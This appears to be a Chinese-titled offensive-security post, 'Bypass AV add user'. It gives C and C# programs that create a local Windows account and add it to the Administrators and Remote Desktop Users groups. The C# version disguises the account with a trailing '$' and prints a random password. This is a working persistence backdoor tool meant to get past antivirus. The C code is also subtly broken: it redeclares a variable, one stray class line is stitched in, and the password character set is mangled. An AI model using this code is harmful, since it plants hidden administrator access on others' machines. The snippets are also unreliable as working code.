Bypass AV 新增使用者

NET_API_STATUS NET_API_FUNCTION NetUserAdd(
  [in]  LPCWSTR servername,
  [in]  DWORD   level,
  [in]  LPBYTE  buf,
  [out] LPDWORD parm_err
);

NET_API_STATUS NET_API_FUNCTION NetLocalGroupAddMember(
  LPCWSTR servername,
  LPCWSTR groupname,
  PSID    membersid
);

#ifndef UNICODE
#define UNICODE
#endif
#pragma comment(lib, "netapi32.lib")

#include <stdio.h>
#include <windows.h> 
#include <lm.h>

int wmain(int argc, wchar_t* argv[])
{
    USER_INFO_1 ui;
    DWORD dwLevel = 1;
    DWORD dwError = 0;
    NET_API_STATUS nStatus;

    if (argc != 3)
    {
        
        fwprintf(stderr, L"Usage:UserAdd.exe <username> <password>\n", argv[0]);
        exit(1);
    }

    ui.usri1_name = argv[1];
    ui.usri1_password = argv[2];
    ui.usri1_priv = USER_PRIV_USER;
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = NULL;
    ui.usri1_flags = UF_SCRIPT;
    ui.usri1_script_path = NULL;

    nStatus = NetUserAdd(NULL,
        dwLevel,
        (LPBYTE)&ui,
        &dwError);

    if (nStatus == NERR_Success)
        fwprintf(stderr, L"User %s has been successfully added\n",argv[1]);

    else
        fprintf(stderr, "A system error has occurred: %d\n", nStatus);

    LOCALGROUP_MEMBERS_INFO_3 account;
    account.lgrmi3_domainandname = argv[1];

    NET_API_STATUS Status = NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
    NET_API_STATUS Status = NetLocalGroupAddMembers(NULL, L"Remote Desktop Users", 3, (LPBYTE)&account, 1);

    if (Status == NERR_Success || Status == ERROR_MEMBER_IN_ALIAS){
        printf("Administrators added Successfully!");
    }
    else {
        printf("Administrators added Failed!");
    }
    return 0;
}

public class DirectoryEntries : System.Collections.IEnumerable

using System;
using System.DirectoryServices;

// Reference:https://docs.microsoft.com/zh-cn/troubleshoot/dotnet/csharp/add-user-local-system

namespace UserAdd
{
    class Class1
    {
        static void Main(string[] args)
        {
            if (args.Length != 1)
            {
                Console.WriteLine("[!] The default is 10 bits random password");
                Console.WriteLine("Usage: UserAdd.exe <username>");
            }
            else
            {
                string user = args[0];
                string username = user + "$";
                //10位隨機密碼
                string chars = "[email protected]#$%0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
                Random randrom = new Random((int)DateTime.Now.Ticks);
                string password = "";
                for (int i = 0; i < 10; i++)
                {
                    password += chars[randrom.Next(chars.Length)];
                }
                try
                {
                    DirectoryEntry AD = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer");
                    DirectoryEntry NewUser = AD.Children.Add(username, "user");
                    NewUser.Invoke("SetPassword", new object[] { password });
                    //NewUser.Invoke("Put", new object[] { "Description", "Test User from .NET" });
                    NewUser.CommitChanges();
                    DirectoryEntry grp;

                    grp = AD.Children.Find("Administrators", "group");
                    if (grp != null) { grp.Invoke("Add", new object[] { NewUser.Path.ToString() }); }
                    grp = AD.Children.Find("Remote Desktop Users", "group");
                    if (grp != null) { grp.Invoke("Add", new object[] { NewUser.Path.ToString() }); }
                    Console.WriteLine("[*] Account Created Successfully");
                    Console.WriteLine($"[+] Username: {username}\n[+] Password: {password}");
                }
                catch (Exception ex)
                {
                    Console.WriteLine(ex.Message);
                }

            }
        }
    }
}